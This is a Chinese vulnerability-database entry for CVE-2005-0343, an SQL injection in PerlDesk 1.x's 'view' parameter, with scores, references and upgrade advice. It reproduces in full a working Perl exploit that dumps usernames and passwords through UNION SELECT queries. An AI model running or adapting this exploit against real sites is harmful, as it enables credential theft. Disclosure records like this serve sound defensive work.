CVE-2005-0343
CVSS7.5
发布时间 :2005-05-02 00:00:00
修订时间 :2016-10-17 23:10:51
NMCOE    

[原文]SQL injection vulnerability in PerlDesk 1.x allows remote attackers to inject arbitrary SQL commands via the view parameter.


[CNNVD]PerlDesk SQL注入漏洞(CNNVD-200505-236)

        PerlDesk 1.x存在SQL注入漏洞,远程攻击者可以通过view参数执行任意SQL命令。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0343
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0343
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-236
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=110782042532295&w=2
(UNKNOWN)  BUGTRAQ  20050207 [SePro Bugtraq] SQL-Injection in PerlDesk 1.x
http://www.security-project.org/projects/board/showthread.php?p=5172#post5172
(VENDOR_ADVISORY)  MISC  http://www.security-project.org/projects/board/showthread.php?p=5172#post5172
http://www.securityfocus.com/bid/12471
(PATCH)  BID  12471
http://xforce.iss.net/xforce/xfdb/19245
(UNKNOWN)  XF  perldesk-view-sql-injection(19245)

- 漏洞信息

PerlDesk SQL注入漏洞
高危 SQL注入
2005-05-02 00:00:00 2005-10-20 00:00:00
远程  
        PerlDesk 1.x存在SQL注入漏洞,远程攻击者可以通过view参数执行任意SQL命令。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接:
        http://www.perldesk.com/helpdesk.0.html

- 漏洞信息 (790)

PerlDesk 1.x SQL-Injection Exploit (EDBID:790)
cgi webapps
2005-02-05 Verified
0 deluxe89
N/A [点击下载]
#!/usr/bin/perl

# Example:
# kb.cgi?view=0 UNION SELECT 1,3,password,username,3,7 FROM users

# Exploit is attached.
# ./pde.pl www.internethosting4u.com /perldesk/kb.cgi 148.244.150.58:80

use IO::Socket;

print '
########################################################
# PerlDesk exploit
#
# Usage: ./pdsploit.pl host path proxy
#
#
#
# Vunerability discovered by
#
# deluxe89 and Astovidatu [ www.security-project.org ]
#
#
#
# Special thanks to doc and WebDoctor´s
#
########################################################

';

if($#ARGV != 2)
{
       exit;
}

$host = $ARGV[0];
$path = $ARGV[1];
$proxy = $ARGV[2];
($addr, $port) = split(/:/, $proxy);

$offset = 0;

while(1)
{
       $value =
"view=0%20UNION%20SELECT%20'0','0',CONCAT('_P',password,'P_'),CONCAT('_U',username,'U_'),'0','0'%20FROM%20users%20LIMIT%20$offset,1";

       $socket = IO::Socket::INET->new(Proto => "tcp",
PeerAddr => $addr, PeerPort => $port) || die "[-]
Proxy doesn't work\n";
       print $socket "GET http://$host$path?$value
HTTP/1.1\nHost: $host\n\n";

       $user = '';
       $pass = '';
       while(defined(my $data = <$socket>))
       {
               if($data =~ m/_P(.*)P_/)
               {
                       $pass = $1;
               }
               if($data =~ m/_U(.*)U_/)
               {
                       $user = $1;
               }
       }

       if($user ne '' && $pass ne '')
       {
               print "$user:$pass\n";
       }
       else
       {
               die "[+] Finished\n";
       }

       $offset++;
}

# code by deluxe89 [ www.security-project.org ]

# milw0rm.com [2005-02-05]
		

- 漏洞信息

13623
PerlDesk kb.cgi view Parameter SQL Injection
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity Upgrade
Exploit Public Vendor Verified

- 漏洞描述

PerlDesk contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the 'kb.cgi' script not properly sanitizing user-supplied input to the 'view' parameter. This may allow an attacker to inject or manipulate SQL queries in the back-end database.

- 时间线

2005-02-07 Unknow
2005-02-07 Unknow

- 解决方案

Upgrade to version 2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站